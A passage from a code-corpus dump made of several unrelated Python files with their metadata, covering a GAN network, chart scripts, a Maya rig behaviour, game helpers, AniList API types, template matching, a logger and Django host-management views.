range(n_layer - 1):\n layers += [Conv2dBlock(dim, dim * 2, 4, 2, 1, norm, activation, pad_type)]\n dim *= 2\n\n layers += [Conv2dBlock(dim, 1, 4, 2, 1, 'none', 'none', pad_type)]\n return nn.Sequential(*layers)\n\n def forward(self, x):\n logits = []\n for scale in range(self.num_scales):\n model = getattr(self, \"model_{}\".format(scale))\n logits += [model(x)]\n x = nn.AvgPool2d(2)(x)\n return logits\n\n\nclass Generator(nn.Module):\n def __init__(self, input_dim, config_gen): # *a, **k : norm, activation, pad_type\n super(Generator, self).__init__()\n\n dim = config_gen['dim']\n dim_latent = config_gen['dim_latent']\n n_blocks = config_gen['n_unet_block']\n norm = config_gen['norm']\n activation = config_gen['activation']\n upsample = config_gen['upsample']\n pad_type = config_gen['pad_type']\n\n dim = min(dim * (2 ** (n_blocks - 1)), 512)\n\n submodule = SkipConnectionBlockNoiseAll(dim, dim, dim_latent, None, 'innermost', upsample, norm, activation,\n pad_type)\n for _ in range(3):\n submodule = SkipConnectionBlockNoiseAll(dim, dim, dim_latent, submodule, 'middle', upsample, norm,\n activation, pad_type)\n\n for _ in range(n_blocks - 5):\n dim //= 2\n submodule = SkipConnectionBlockNoiseAll(dim, dim * 2, dim_latent, submodule, 'middle', upsample, norm,\n activation, pad_type)\n\n submodule = SkipConnectionBlockNoiseAll(input_dim, dim, dim_latent, submodule, 'outermost', upsample, norm, activation,\n pad_type)\n\n self.model = submodule\n\n def forward(self, x, z):\n return self.model(x, z)\n\n\nclass SkipConnectionBlockNoiseAll(nn.Module):\n def __init__(self, input_dim, inner_dim, latent_dim, submodule, position,\n upsample_mode='nearest', norm='in', activation='lrelu', pad_type='zero'): # pad_type should not 'reflect' or 'replicate'\n super(SkipConnectionBlockNoiseAll, self).__init__()\n self.inner_dim = inner_dim\n self.submodule = submodule\n self.position = position\n\n self.tmp = input_dim + latent_dim\n\n if position == 'outermost':\n self.down = Conv2dBlock(input_dim + latent_dim, inner_dim, 3, stride=1, padding=1, norm='none', activation=activation, pad_type=pad_type)\n self.submodule = submodule\n self.up = Conv2dBlock(self.skip_connected_dim(), input_dim, 3, stride=1, padding=1, norm='none', activation='tanh', pad_type=pad_type)\n\n elif position == 'middle':\n self.down = Conv2dBlock(input_dim + latent_dim, inner_dim, 4, stride=2, padding=1, norm=norm, activation=activation, pad_type=pad_type)\n self.submodule = submodule\n self.up = Conv2dUpsampleBlock(self.skip_connected_dim(), input_dim, upsample_mode, 3, padding=1, norm=norm, activation='relu',\n pad_type=pad_type)\n\n elif position == 'innermost':\n assert not submodule, 'No skip connection for innermost layer'\n self.down = Conv2dBlock(input_dim + latent_dim, inner_dim, 4, stride=2, padding=1, norm=norm, activation=activation, pad_type=pad_type)\n self.up = Conv2dUpsampleBlock(inner_dim, input_dim, upsample_mode, 3, padding=1, norm=norm, activation='relu', pad_type=pad_type)\n\n else:\n raise NotImplementedError(\"Unsupported unet position: {}\".format(position))\n\n self.output_dim = input_dim\n\n def skip_connected_dim(self):\n return self.submodule.output_dim + self.inner_dim\n\n def forward(self, x, z):\n z_repeat = z.view(z.size(0), -1, 1, 1).repeat(1, 1, x.size(2), x.size(3))\n x_z = torch.cat([x, z_repeat], 1)\n\n if self.position == 'outermost':\n logit = self.down(x_z)\n logit = self.submodule(logit, z)\n logit = self.up(logit)\n return logit\n if self.position == 'middle':\n logit = self.down(x_z)\n logit = self.submodule(logit, z)\n logit = self.up(logit)\n return torch.cat([logit, x], 1)\n\n else: # innermost\n logit = self.down(x_z)\n logit = self.up(logit)\n return torch.cat([logit, x], 1)\n\n\nclass Encoder(nn.Module): # TODO : to ResNet / VAE like?\n def __init__(self, input_dim, config_enc):\n super(Encoder, self).__init__()\n\n dim_out = config_enc['dim']\n self.dim_latent = config_enc['dim_latent']\n n_down = config_enc['n_downsample']\n norm = config_enc['norm']\n activation = config_enc['activation']\n pad_type = config_enc['pad_type']\n\n layers = []\n layers += [Conv2dBlock(input_dim, dim_out, 7, 2, 3, 'none', activation, pad_type)]\n for _ in range(1, n_down):\n dim_in = dim_out\n dim_out = min(dim_out * 2, 256)\n layers += [ResBlockDownsample(dim_in, dim_out, 3, 2, 1, norm, activation, pad_type, 'avg')]\n\n layers += [nn.AdaptiveAvgPool2d(1)]\n self.conv_mu = Conv2dBlock(dim_out, self.dim_latent, kernel_size=1, stride=1, padding=0, norm='none', activation='none')\n self.conv_sigma = Conv2dBlock(dim_out, self.dim_latent, kernel_size=1, stride=1, padding=0, norm='none', activation='none')\n\n self.layers = layers\n self.model = nn.Sequential(*layers)\n\n def forward(self, x):\n logit = self.model(x)\n\n mu = self.conv_mu(logit).view(logit.size(0), self.dim_latent)\n log_sigma = self.conv_sigma(logit).view(logit.size(0), self.dim_latent)\n return mu, log_sigma\n\n","sub_path":"networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"118473511","text":"import pygal\nfrom pyecharts import Map\n\n\nbar_chart = pygal.Bar()\nbar_chart.add('Fibonacci', [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55])\nbar_chart.render_to_file('Hello.svg')\n\n'''\nline_chart = pygal.Line()\nline_chart.title = 'Browser usage evolution (in %)'\nline_chart.x_labels = map(str, range(2002, 2013))\nline_chart.add('Firefox', [None, None, 0, 16.6, 25, 31, 36.4, 45.5, 46.3, 42.8, 37.1])\nline_chart.add('Chrome', [None, None, None, None, None, None, 0, 3.9, 10.8, 23.8, 35.3])\nline_chart.add('IE', [85.8, 84.6, 84.7, 74.5, 66, 58.6, 54.7, 44.8, 36.2, 26.6, 20.1])\nline_chart.add('Others', [14.2, 15.4, 15.3, 8.9, 9, 10.4, 8.9, 5.8, 6.7, 6.8, 7.5])\nline_chart.render_to_file('Hello_line_chart.svg')\n'''\n\nvalue = [78, 72, 65, 95, 85, 81, 50 ,90]\nattr = [\"江苏\", \"山东\", \"安徽\", \"上海\", \"浙江\", \"广东\", \"四川\", \"北京\"]\nmap = Map(\"年轻族群生活形态城市分布\", width=1200, height=600)\nmap.add(\"\", attr, value, maptype='china', is_visualmap=True, visual_text_color='#000')\nmap.show_config()\nmap.render()\n\n","sub_path":"map/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"413329397","text":"\n\nimport pymel.core as pm\n\nimport Abstracts.Abstract_Behavior as absBhv\nimport Utilities.Rig_Utilities as rigUtil\n\nimport Utilities.Logger as log\nimport SceneData.Joint as jnt\n\nclass Empty_01(absBhv.Abstract_Behavior):\n bhvType = 'Empty1'\n validLimbTypes = (0,) # rigData.LIMB_TYPES\n groupType = 'Empty' # LookAt, IKPV...\n groupShape = 'Square_Wire'\n groupCount = 1\n groupMoveable = True # for moving control pivots\n uiOrderIndex = 110 \n usesJointControls = False\n usesLimbControls = True\n bakeLosesData = False\n duplicateJointGroups = False\n \n def InitLimb(self, limb):\n log.funcFileDebug()\n pm.select(d=1)\n if pm.listConnections(limb.joints):\n return\n joint = pm.joint()\n rigRoot = pm.listConnections(limb.rigRoot)[0]\n jnt.Joint.Add(rigRoot, 0, limb, joint)\n joint.pfrsName.set(self.groupType)\n joint.v.set(0)\n jointGroup = pm.listConnections(joint.group)[0]\n jointGroup.v.set(0)\n jointParentGroup = pm.listConnections(rigRoot.jointsParentGroup)[0]\n pm.parent(joint, jointParentGroup)\n \n def CleanupLimb(self, limb):\n log.funcFileDebug()\n joint = pm.listConnections(limb.joints)[0]\n jnt.Joint.Delete(joint)\n \n#============= FOR BEHAVIOR OPERATION ============================\n\n def Setup_ForBhvOp(self, limb):\n pass\n \n def Teardown_ForBhvOp(self, limb):\n pass\n \n#============= SETUP ============================\n\n def Setup_Rig_Controls(self, limb):\n log.funcFileDebug()\n parentControl = rigUtil.GetParentControl(limb)\n group = rigUtil.GetLimbGroups(limb, self.groupType)[0]\n if parentControl:\n pm.parentConstraint(parentControl, group, mo=1)\n \n def Setup_Constraint_JointsToControls(self, limb):\n log.funcFileDebug()\n limbGroup = rigUtil.GetLimbGroups(limb, self.groupType)[0]\n joint = pm.listConnections(limb.joints)[0]\n control = pm.listConnections(limbGroup.control)[0]\n pm.parentConstraint(control, joint)\n jointGroup = pm.listConnections(joint.group)[0]\n pm.parent(jointGroup, joint)\n # pm.parentConstraint(joint, jointGroup)\n \n def Setup_Constraint_ControlsToXforms(self, limb, \n xforms, hasPosCst, hasRotCst, hasScaleCst):\n log.funcFileDebug()\n xform = xforms[0]\n group = rigUtil.GetLimbGroups(limb, self.groupType)[0]\n control = pm.listConnections(group.control)[0]\n if hasPosCst:\n pm.pointConstraint(xform, control)\n if hasRotCst:\n pm.orientConstraint(xform, control)\n if hasScaleCst:\n pm.scaleConstraint(xform, control)\n return [control]\n \n#============= TEARDOWN ============================\n\n def Teardown_Rig_Controls(self, limb):\n log.funcFileDebug()\n if pm.listConnections(limb.limbParent):\n group = pm.listConnections(limb.limbGroups)[0]\n cst = pm.listRelatives(group, c=1, type='parentConstraint')\n pm.delete(cst)\n\n def Teardown_Constraint_JointsToControls(self, limb):\n log.funcFileDebug()\n joint = pm.listConnections(limb.joints)[0]\n # jointGroup = pm.listConnections(joint.group)[0]\n pm.delete(pm.listRelatives(joint, c=1, type='constraint'))\n # pm.delete(pm.listRelatives(jointGroup, c=1, type='constraint'))\n \n def Teardown_Constraint_ControlsToXforms(self, limb):\n log.funcFileDebug()\n group = rigUtil.GetLimbGroups(limb, self.groupType)[0]\n control = pm.listConnections(group.control)[0]\n pm.delete(pm.listRelatives(control, c=1, type='constraint'))\n \n#============= EDITABLE UI ============================\n\n def Setup_Behavior_Limb_UI(self, limb):\n log.funcFileDebug()\n return False\n \n#============= ANIMATION UI ============================\n\n def Setup_AnimationTools_Limb_UI(self, limb):\n return False # return if UI is enabled\n \n \n# Copyright (c) 2021 Trevor Payne\n# See user license in \"PayneFreeRigSuite\\Data\\LicenseAgreement.txt\"\n","sub_path":"Behaviors/Empty_01.py","file_name":"Empty_01.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"32944126","text":"import random\nimport numpy as np\nfrom scipy.stats import norm\nimport io\nfrom datetime import datetime, timedelta\nimport math\nimport pygame\n\nimport merc\nimport events\nimport army as arm\n\nfirstnames = [] # Mercenaries randomly made of\nlastnames = []\n\npikemanImg = pygame.image.load('res/pikeman.png')\ncavalryImg = pygame.image.load('res/cavalry.png')\nmusketeerImg = pygame.image.load('res/musketeer.png')\n\n\ndef bellAge() -> []:\n x = [random.randint(1, 100) for i in range(100)]\n mean = np.mean(x)\n sd = np.std(x)\n pdf = list(map(lambda x: ((x-18) /2) +18, (np.pi*sd) * np.exp(-0.5*((x-mean)/sd)**2)))\n return round(pdf[random.randint(0, 99)])\n\n\ndef readNames():\n with io.open(\"res/firstnames.txt\", mode = \"r\", encoding = \"utf-8\") as file:\n global firstnames\n firstnames = file.readlines()\n for i in range(len(firstnames)):\n firstnames[i] = firstnames[i].strip(\"\\n\")\n \n with io.open(\"res/familynames.txt\", mode = \"r\", encoding = \"utf-8\") as file:\n global lastnames\n lastnames = file.readlines()\n for i in range(len(lastnames)):\n lastnames[i] = lastnames[i].strip(\"\\n\")\n\n\ndef oneToTwoSeconds():\n # return random.randint(100, 200) /100\n return random.randint(0, 100) /100\n\n\ndef makeRecruit():\n rec = merc.Merc()\n random.seed()\n rec.firstname = random.choice(firstnames)\n rec.lastname = random.choice(lastnames)\n rec.pay = random.randint(2, 16)\n rec.strength = random.randint(1, 255)\n rec.dexterity = random.randint(1, 255)\n rec.intelligence = random.randint(1, 255)\n rec.charisma = random.randint(1, 255)\n rec.confidence = random.randint(1, 255)\n rec.birthday = events.Event.pointInTime - timedelta(days =365 * bellAge() + random.randint(1, 365))\n # Perks:\n perks = merc.perkList[:]\n if roll(30):\n rec.perks.append(perks.pop(random.randint(0, len(perks)-1)))\n if roll(20):\n rec.perks.append(perks.pop(random.randint(0, len(perks)-1)))\n if roll(10):\n rec.perks.append(perks.pop(random.randint(0, len(perks)-1)))\n \n # for i in range(3): # max 3 perks\n # prob = random.randint(0, 11) # probability\n # if i >= prob:\n # while True: # no duplicates\n # perk = getRandomPerk()\n # found = False\n # for p in rec.perks:\n # if p.name == perk.name:\n # found = True\n # if found: continue\n # rec.perks.append(perk)\n # break\n return rec\n\ndef roll(prob):\n return prob in range(random.randint(1, 100), 100)\n\ndef make10Recs():\n mercs = []\n for i in range(10):\n mercs.append(makeRecruit())\n return mercs\n\n\ndef make100Recs():\n return list(map(lambda x:makeRecruit(), range(100)))\n\n\ndef getRandomPerk():\n rand = random.randint(0, len(merc.perkList) -1)\n return merc.perkList[rand]\n\n\ndef getRandomTroopType():\n rand = random.randint(0, 2)\n if rand == 0: return merc.UnitType.pikeman\n if rand == 1: return merc.UnitType.cavalry\n if rand == 2: return merc.UnitType.musketeer\n\n\ndef getRandomPikemen(count):\n pm = []\n for i in range(count):\n rec = makeRecruit()\n rec.xp.typ = merc.UnitType.pikeman\n pm.append(rec)\n return pm\n \n\ndef randomArmy(noofSectors, noofTroops):\n army = arm.Army(noofSectors)\n pikemen = []\n cavalryMen = []\n musketeers = []\n for t in range(noofTroops):\n recruit = makeRecruit()\n recruit.xp.typ = getRandomTroopType()\n if recruit.xp.typ == merc.UnitType.pikeman:\n pikemen.append(recruit)\n if recruit.xp.typ == merc.UnitType.cavalry:\n cavalryMen.append(recruit)\n if recruit.xp.typ == merc.UnitType.musketeer:\n musketeers.append(recruit)\n for i,s in enumerate(army.sectors):\n s.pikemen = pikemen[i:math.floor(len(pikemen) /len(army.sectors)) *(i +1)]\n s.cavalryMen = cavalryMen[i:math.floor(len(cavalryMen) /len(army.sectors)) *(i +1)]\n s.musketeers = musketeers[i:math.floor(len(musketeers) /len(army.sectors)) *(i +1)]\n return army\n\n\ndef buildLowArmy(sectors, pikemen = 0, cavalryMen = 0, musketeers = 0):\n p = getRandomPikemen(pikemen)\n army = arm.Army()\n for i in range(sectors):\n army.sectors.append(arm.Sector('Sector ' +str(i), p))\n return army\n\n\ndef countWounds(army: arm.Army):\n w = 0\n for s in army.sectors:\n for p in s.pikemen:\n w += p.wounds\n for p in s.pikemen:\n w += p.wounds\n for p in s.pikemen:\n w += p.wounds\n return w","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"252729052","text":"# The contents of this file is free and unencumbered software released into the\n# public domain. For more information, please refer to \n\nfrom anilistWrapPY.errors.types import Error\nfrom dataclasses import dataclass\nfrom typing import Optional, Any, List\n\nfrom anilistWrapPY.utils import from_union, from_str, from_none, from_int, from_list, to_class\n\n\n@dataclass\nclass NextAiringEpisode:\n airing_at: Optional[int] = None\n time_until_airing: Optional[int] = None\n episode: Optional[int] = None\n\n @staticmethod\n def from_dict(obj: Any) -> 'NextAiringEpisode':\n assert isinstance(obj, dict)\n airing_at = from_union([from_int, from_none], obj.get(\"airingAt\"))\n time_until_airing = from_union([from_int, from_none], obj.get(\"timeUntilAiring\"))\n episode = from_union([from_int, from_none], obj.get(\"episode\"))\n return NextAiringEpisode(airing_at, time_until_airing, episode)\n\n def to_dict(self) -> dict:\n result: dict = {}\n result[\"airingAt\"] = from_union([from_int, from_none], self.airing_at)\n result[\"timeUntilAiring\"] = from_union([from_int, from_none], self.time_until_airing)\n result[\"episode\"] = from_union([from_int, from_none], self.episode)\n return result\n\n\n@dataclass\nclass Title:\n romaji: Optional[str] = None\n english: Optional[str] = None\n native: Optional[str] = None\n\n @staticmethod\n def from_dict(obj: Any) -> 'Title':\n assert isinstance(obj, dict)\n romaji = from_union([from_str, from_none], obj.get(\"romaji\"))\n english = from_union([from_none, from_str], obj.get(\"english\"))\n native = from_union([from_str, from_none], obj.get(\"native\"))\n return Title(romaji, english, native)\n\n def to_dict(self) -> dict:\n result: dict = {}\n result[\"romaji\"] = from_union([from_str, from_none], self.romaji)\n result[\"english\"] = from_union([from_none, from_str], self.english)\n result[\"native\"] = from_union([from_str, from_none], self.native)\n return result\n\n\n@dataclass\nclass Media:\n id: Optional[int] = None\n banner_image: Optional[str] = None\n episodes: Optional[int] = None\n title: Optional[Title] = None\n site_url: Optional[str] = None\n next_airing_episode: Optional[NextAiringEpisode] = None\n\n @staticmethod\n def from_dict(obj: Any) -> 'Media':\n assert isinstance(obj, dict)\n id = from_union([from_int, from_none], obj.get(\"id\"))\n banner_image = from_union([from_none, from_str], obj.get(\"bannerImage\"))\n episodes = from_union([from_int, from_none], obj.get(\"episodes\"))\n title = from_union([Title.from_dict, from_none], obj.get(\"title\"))\n site_url = from_union([from_str, from_none], obj.get(\"siteUrl\"))\n next_airing_episode = from_union([NextAiringEpisode.from_dict, from_none], obj.get(\"nextAiringEpisode\"))\n return Media(id, banner_image, episodes, title, site_url, next_airing_episode)\n\n def to_dict(self) -> dict:\n result: dict = {}\n result[\"id\"] = from_union([from_int, from_none], self.id)\n result[\"bannerImage\"] = from_union([from_none, from_str], self.banner_image)\n result[\"episodes\"] = from_union([from_int, from_none], self.episodes)\n result[\"title\"] = from_union([lambda x: to_class(Title, x), from_none], self.title)\n result[\"siteUrl\"] = from_union([from_str, from_none], self.site_url)\n result[\"nextAiringEpisode\"] = from_union([lambda x: to_class(NextAiringEpisode, x), from_none], self.next_airing_episode)\n return result\n\n\n@dataclass\nclass Page:\n media: Optional[List[Media]] = None\n\n @staticmethod\n def from_dict(obj: Any) -> 'Page':\n assert isinstance(obj, dict)\n media = from_union([lambda x: from_list(Media.from_dict, x), from_none], obj.get(\"media\"))\n return Page(media)\n\n def to_dict(self) -> dict:\n result: dict = {}\n result[\"media\"] = from_union([lambda x: from_list(lambda x: to_class(Media, x), x), from_none], self.media)\n return result\n\n\n@dataclass\nclass Data:\n page: Optional[Page] = None\n\n @staticmethod\n def from_dict(obj: Any) -> 'Data':\n assert isinstance(obj, dict)\n page = from_union([Page.from_dict, from_none], obj.get(\"Page\"))\n return Data(page)\n\n def to_dict(self) -> dict:\n result: dict = {}\n result[\"Page\"] = from_union([lambda x: to_class(Page, x), from_none], self.page)\n return result\n\n\n@dataclass\nclass AnilistAiring:\n data: Optional[Data] = None\n errors: Optional[List[Error]] = None\n\n @staticmethod\n def from_dict(obj: Any) -> 'AnilistAiring':\n assert isinstance(obj, dict)\n data = from_union([Data.from_dict, from_none], obj.get(\"data\"))\n return AnilistAiring(data)\n\n def to_dict(self) -> dict:\n result: dict = {}\n result[\"data\"] = from_union([lambda x: to_class(Data, x), from_none], self.data)\n return result\n","sub_path":"anilistWrapPY/Airing/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"103913587","text":"import math\nimport cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom math import sqrt\nclass functions:\n\n temp_bool=True\n input_bool=False\n\n def __init__(self,image,template,threshold,step):\n self.image=image\n self.template=template\n self.threshold = threshold\n self.sample_size=len(threshold)\n self.step=step\n self.samples=[]\n for i in range(self.sample_size):\n self.samples.append(image.copy())\n \n def get_avg(self,x, y,is_tmp):\n if is_tmp:\n current_image=self.template\n else: current_image = self.image\n\n r, s = 0, 0\n p = len(self.template)\n q = len(self.template[0])\n sum = 0\n for r in range(p):\n for s in range(q):\n sum = sum + current_image[x+r, y+s]\n return sum/(p*q)\n\n def calc_std(self,r,c,avg,is_tmp):\n if is_tmp:\n current_image=self.template\n else: current_image = self.image\n rows = len(self.template)\n columns = len(self.template[0])\n\n mt=np.zeros((rows,columns))\n for i in range(r,r+rows):\n for j in range(c,c+columns):\n #print(i,j)\n mt[i-r][j-c]=current_image[i][j]-avg\n return mt\n def scalar_product(self,m1,m2):\n\n rows=len(m1)\n columns = len(m1[0])\n #ret = np.zeros((rows,columns))\n sum=0\n for r in range(rows):\n for c in range(columns):\n sum+=m1[r][c]*m2[r][c]\n return sum\n\n def sqrr_std(self,im_std):\n rows = len(im_std)\n columns = len(im_std[0])\n\n sum=0\n for r in range(rows):\n for c in range(columns):\n sum+=im_std[r][c]*im_std[r][c]\n return sqrt(sum)\n def print_rectangles(self,res,c_r,c_r_temp):\n for i in range(self.sample_size):\n if res>self.threshold[i]:\n cv2.rectangle(self.samples[i],(c_r[0],c_r[1]),(c_r[0]+c_r_temp[0],c_r[1]+c_r_temp[1]),(0,0,255),5)\n\n def get_corr_matrix(self):\n tmp_std=self.calc_std(0,0,self.get_avg(0,0,self.temp_bool),self.temp_bool)\n sqrr_tmp_std = self.sqrr_std(tmp_std)\n rows_input = len(self.image)\n columns_input = len(self.image[0])\n print(\"Input sizes:\",str(rows_input),str(columns_input))\n rows_temp = len(self.template)\n columns_temp = len(self.template[0])\n print(\"Temp sizes:\",str(rows_temp),str(columns_temp))\n res=0\n corr_matrix=np.zeros((int((rows_input-rows_temp)/self.step)+1,int((columns_input-columns_temp)/self.step)+1))\n \n for r in range(0,rows_input-rows_temp+1,self.step):\n for c in range(0,columns_input-columns_temp+1,self.step):\n print(r,c)\n inp_std=self.calc_std(r,c,self.get_avg(r,c,self.input_bool),self.input_bool)\n op1=self.scalar_product(tmp_std,inp_std)\n sqrr_inp_std = self.sqrr_std(inp_std)\n op2=sqrr_inp_std*sqrr_tmp_std\n res=op1/op2\n self.print_rectangles(res,[c,r],[columns_temp,rows_temp]);\n print(res)\n corr_matrix[int(r/self.step)][int(c/self.step)] = res\n for i in range(self.sample_size):\n cv2.imshow(\"Sample_\"+str(i)+\"-Threshold: \"+str(self.threshold[i]),self.samples[i])\n cv2.imwrite(\"../output/out_\"+str(i)+\"-\"+str(self.threshold[i])+\".png\",self.samples[i])\n cv2.waitKey(0)\n return corr_matrix\n","sub_path":"code/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"109505277","text":"# coding:utf8\r\nimport cStringIO\r\nimport datetime\r\nimport sys\r\nimport traceback\r\n\r\nimport gevent\r\nfrom flask import request\r\n\r\nfrom feather import util\r\nfrom feather.util import serviceName\r\n\r\nDEBUG = 0\r\nINFO = 1\r\nNOTICE = 2\r\nWARNING = 3\r\nERROR = 4\r\nEXCEPTION = 5\r\n\r\nfp = None\r\nisPrint = True\r\nflushInterval = 10\r\nlevel = 0\r\nlevelPrefix = (\"debug\", \"info\", \"notice\", \"warning\", \"error\", \"exception\")\r\n\r\n\r\ndef init(logConfig={}):\r\n global isPrint, flushInterval, level\r\n isPrint = logConfig.get('isPrint', True)\r\n flushInterval = logConfig.get('flushInterval', 10)\r\n level = logConfig.get('level', 0)\r\n\r\n\r\ndef _autoFlush():\r\n while not fp.closed:\r\n fp.flush()\r\n if isPrint:\r\n sys.stdout.flush()\r\n gevent.sleep(flushInterval)\r\n\r\n\r\ndef setFp(f):\r\n global fp\r\n fp = f\r\n gevent.spawn(_autoFlush)\r\n\r\n\r\ndef isClosed():\r\n return fp.closed\r\n\r\n\r\ndef close():\r\n fp.close()\r\n\r\n\r\ndef write(level, fmt, args=None):\r\n if args:\r\n content = fmt % args\r\n else:\r\n content = fmt\r\n\r\n prefix = levelPrefix[level]\r\n strTime = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S,%f\")\r\n content = '%s [%s] : [%s] ' % (strTime, prefix, serviceName) + content + '\\n'\r\n if fp:\r\n fp.write(content)\r\n if isPrint:\r\n sys.stdout.write(content)\r\n else:\r\n sys.stdout.write(content)\r\n\r\n\r\ndef debug(fmt, *args):\r\n if level <= DEBUG:\r\n write(0, fmt, args)\r\n\r\n\r\ndef info(fmt, *args):\r\n if level <= INFO:\r\n write(1, fmt, args)\r\n\r\n\r\ndef notice(fmt, *args):\r\n if level <= NOTICE:\r\n write(2, fmt, args)\r\n\r\n\r\ndef warning(fmt, *args):\r\n if level <= WARNING:\r\n write(3, fmt, args)\r\n\r\n\r\ndef error(fmt, *args):\r\n if level <= ERROR:\r\n write(4, fmt, args)\r\n\r\n\r\ndef formatException(ei):\r\n sio = cStringIO.StringIO()\r\n traceback.print_exception(ei[0], ei[1], ei[2], None, sio)\r\n s = sio.getvalue()\r\n sio.close()\r\n if s[-1:] == \"\\n\":\r\n s = s[:-1]\r\n return s\r\n\r\n\r\ndef exception(fmt='', *args):\r\n if level <= EXCEPTION:\r\n if args:\r\n fmt = fmt % args\r\n\r\n info = formatException(sys.exc_info())\r\n if util.systemType == util.WINDOWS and type(info) == str:\r\n try:\r\n info = info.decode('gbk')\r\n except:\r\n pass\r\n\r\n fmt += '\\n%s' % info\r\n write(5, fmt)\r\n\r\n\r\ndef web(logLevel=NOTICE):\r\n if level <= logLevel:\r\n write(logLevel, 'web request log(ip:%s func:%s args:%s)'\r\n % (util.getWebRemoteAddr(), request.path[1:], {key:val for key, val in request.values.iteritems()}))\r\n\r\n\r\ndef stack(logLevel):\r\n if level <= logLevel:\r\n write(logLevel, ''.join(traceback.format_stack()))\r\n\r\n\r\nclass WebLog(object):\r\n def __init__(self, level=0):\r\n self._level = level\r\n\r\n def write(self, content):\r\n if level <= self._level:\r\n write(self._level, content[:-1])\r\n\r\n def setLevel(self, level):\r\n self._level = level\r\n","sub_path":"after/engine/feather/util/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"571984164","text":"import sys\nsys.path.append('../')\nfrom random import choice\nfrom Player import Player\nfrom typing import typing\n\nclass mage(Player):\n\n elements = [\"огненный\", \"водяной\", \"каменный\", \"електрический\"]\n\n def __init__(self):\n super().__init__()\n self.max_mana = 100\n self.mana = self.max_mana\n \n def add_mana(self, i):\n self.mana += i\n if self.mana > self.max_mana:\n self.mana = self.max_mana\n \n def add_max_mana(self, i):\n self.max_mana += i\n\n def levelUp(self):\n super().levelUp()\n self.add_max_mana(10)\n self.mana = self.max_mana\n self.add_intelligence(2)\n \n def skill_description(self):\n return \"1) Обычная атака. \\n2) Сильная атака. \\n3)Очень сильная атака\"\n\n def skill1(self):\n typing(\"Вы бьете врага.\")\n damage = 5 + self.strenght\n return damage\n \n def skill2(self):\n if self.mana >= 10:\n typing(\"Вы бросаете во врага малый \" + choice(self.elements) + \" шар.\")\n damage = 15 + self.intelligence\n self.add_mana(-10)\n return damage\n else:\n typing(\"Не хватает маны.\")\n\n def skill3(self):\n if self.mana >= 20:\n typing(\"Вы бросаете во врага \" + choice(self.elements) + \" шар.\")\n damage = 25 + self.intelligence\n self.add_mana(-20)\n return damage\n else:\n typing(\"Не хватает маны.\")\n\n def short_info(self):\n return \"Здоровье: \" + str(self.health) + \"\\nМана: \" + str(self.mana)\n \n def __str__(self):\n characteristics = { \"Имя\": self.name, \"Уровень\": self.lvl, \"Здоровье\": self.health, \"Мана\": self.mana, \"Сила\": self.strenght, \"Ловкость\": self.dexterity, \"Точность\": self.accuaracy, \"Интелект\":self.intelligence, \"Защита\": self.protection, \"Опыта до уровня\": 100-self.exp}\n out = ''\n for i in characteristics:\n out += i + ': ' + str(characteristics.get(i)) + '\\n'\n return out","sub_path":"class/mage.py","file_name":"mage.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"337529063","text":"# coding=utf-8\n\"\"\"\n@Time : 2017/11/29\n@Author : cms\n@Desc : 主机管理接口\n\"\"\"\nimport requests\nimport time\nimport threading\n\nfrom django.contrib.auth.decorators import login_required\nfrom operator import itemgetter # itemgetter用来去dict中的key,省去了使用lambda函数\n\nfrom influxdb_metrics.utils import query\nfrom hostapp.hostlist import iplist, pool\nfrom hostapp.nodeManager import models\nfrom .models import *\nfrom lib.nmclilib import NmcliNetork\nfrom logapp.views import *\nfrom visitapp.models import Access_manage\nnmc = NmcliNetork.Nmclilib()\nHost = iplist.HostManager()\n\n\n@params('/host/detail/', u'主机详情查看')\ndef host_detail(request: object, ip: object) -> object: # 主机详情页面\n try:\n list = Host.host_list_info(ip) # 主机详情\n data = Host.net_info(ip) # 网卡总表\n nlist = get_network_all(data, ip) # 网络详情\n bat = Host.disk_info_all(ip)\n bat.sort(key=itemgetter('equipment')) # 需要先排序,然后才能groupby。lst排序后自身被改变\n return render(request, 'host/detail.html', {'node_detail': list, 'nlist': nlist, 'dev': bat})\n except:\n logging.info('主机详情获取失败')\n return None\n\n\n# @login_required\n@params('/host/cpu/', u'CPU查看')\ndef cpu(request):\n # models.mongodb_cluster_master_node_r()\n # models.mongodb_cluster_master_node_rs()\n a = Access_manage.objects.all().values()\n print(a)\n obj = cpu_all_info.objects.all().values()\n for i in obj:\n lists_str = i['cpu_info']\n lists = eval(lists_str)\n # all_info = models.cpu_info.objects.all()\n # for i in all_info:\n # lists = i.cpu_info\n return render(request, 'host/cpu.html', {'cpumem': lists})\n\n\n# 管理主机列表\n@params('/host/list/', u'管理主机列表')\ndef host_list(request):\n # lists = models.node_list.objects.all()\n # list = Host.public_node_host('disk_info_all')\n # for i in lists:\n # list = i.disk_info\n # list = list['disk_info']\n obj = node_list.objects.all().values()\n for i in obj:\n print(i)\n print(1232134534)\n # lists_str = i['disk_info']\n\n lists = i['node_list']\n lists = eval(lists)\n return render(request, 'host/host.html', {'hlist': lists})\n\n\n# 获取改节点全部详情网络\ndef get_network_all(data, ip):\n nlist = []\n for val in data:\n if val['ip'] == ip:\n res = pool.public_api(ip, '/api/nmclic/status', data={'devname': 